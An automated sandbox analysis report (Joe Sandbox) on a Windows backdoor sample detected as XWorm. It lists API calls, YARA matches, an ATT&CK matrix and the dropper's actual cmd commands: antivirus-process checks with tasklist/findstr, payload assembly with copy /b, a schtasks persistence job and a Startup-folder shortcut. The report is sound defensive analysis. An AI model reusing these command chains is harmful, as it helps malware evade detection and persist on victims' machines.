Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047C622 FindFirstFileExW,	11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,	11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B7333 FindFirstFileW,FindClose,	11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_004B73D4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Source: Telecom.pif, 0000000B.00000002.2443431960.0000000003ABB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

API call chain: ExitProcess graph end node

graph_0-3390

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BF4FF BlockInput,

11_2_004BF4FF

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_0044338B

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00465058 mov eax, dword ptr fs:[00000030h]

11_2_00465058

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

11_2_004A20AA

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00472992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00472992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00460BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460D45 SetUnhandledExceptionFilter,	11_2_00460D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00460F91

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: D7D000			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004A1B4D

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_0044338B

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004ABBED SendInput,keybd_event,

11_2_004ABBED

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004AEC6C mouse_event,

11_2_004AEC6C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A14AE GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

11_2_004A14AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_004A1FB0

Source: Telecom.pif, 0000000B.00000003.1222451762.00000000044C9000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmp, EcoScape.pif, 00000013.00000002.1246780607.0000000000503000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Telecom.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00460A08 cpuid

11_2_00460A08

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0049E5F4 GetLocalTime,

11_2_0049E5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0049E652 GetUserNameW,

11_2_0049E652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0047BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_0047BCD2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Code function: 0_2_0040350A EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040350A

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR

Source: Telecom.pif	Binary or memory string: WIN_81
Source: Telecom.pif	Binary or memory string: WIN_XP
Source: Commander.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Telecom.pif	Binary or memory string: WIN_XPe
Source: Telecom.pif	Binary or memory string: WIN_VISTA
Source: Telecom.pif	Binary or memory string: WIN_7
Source: Telecom.pif	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004C2263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		11_2_004C2263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004C1C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		11_2_004C1C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	11 Windows Management Instrumentation	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	121 Input Capture	2 System Time Discovery	Remote Services	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	121 Input Capture	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	21 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	21 Access Token Manipulation	2 Software Packing	NTDS	28 System Information Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	2 Registry Run Keys / Startup Folder	212 Process Injection	1 DLL Side-Loading	LSA Secrets	41 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	111 Masquerading	Cached Domain Credentials	4 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	2 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	4 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	1 Remote System Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	Stripped Payloads	Input Capture	1 System Network Configuration Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	21%	Virustotal		Browse
SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	21%	ReversingLabs	Win32.Trojan.Leonem

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	1%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast	4%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast	1%	Virustotal	Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sCMixbVNmKacbXAnMNdtVVILqF.sCMixbVNmKacbXAnMNdtVVILqF	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/Dh8E7H3R	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.autoitscript.com/autoit3/X	Telecom.pif, 0000000B.00000000.1216712688.0000000000515000.00000002.00000001.01000000.00000006.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, EcoScape.pif, 00000013.00000000.1232198341.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 0000001D.00000002.1397522322.0000000000515000.00000002.00000001.01000000.00000009.sdmp, EcoScape.pif, 00000027.00000000.1816275149.0000000000515000.00000002.00000001.01000000.00000009.sdmp, Telecom.pif.9.dr, EcoScape.pif.11.dr, Commander.0.dr	false	high
http://nsis.sf.net/NSIS_ErrorError	SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	false	high
https://www.autoitscript.com/autoit3/	Telecom.pif, 0000000B.00000002.2443989987.0000000004500000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000003.1222451762.00000000044D7000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif.9.dr, Tramadol.0.dr, EcoScape.pif.11.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1417469
Start date and time:	2024-03-29 11:37:17 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe
Detection:	MAL
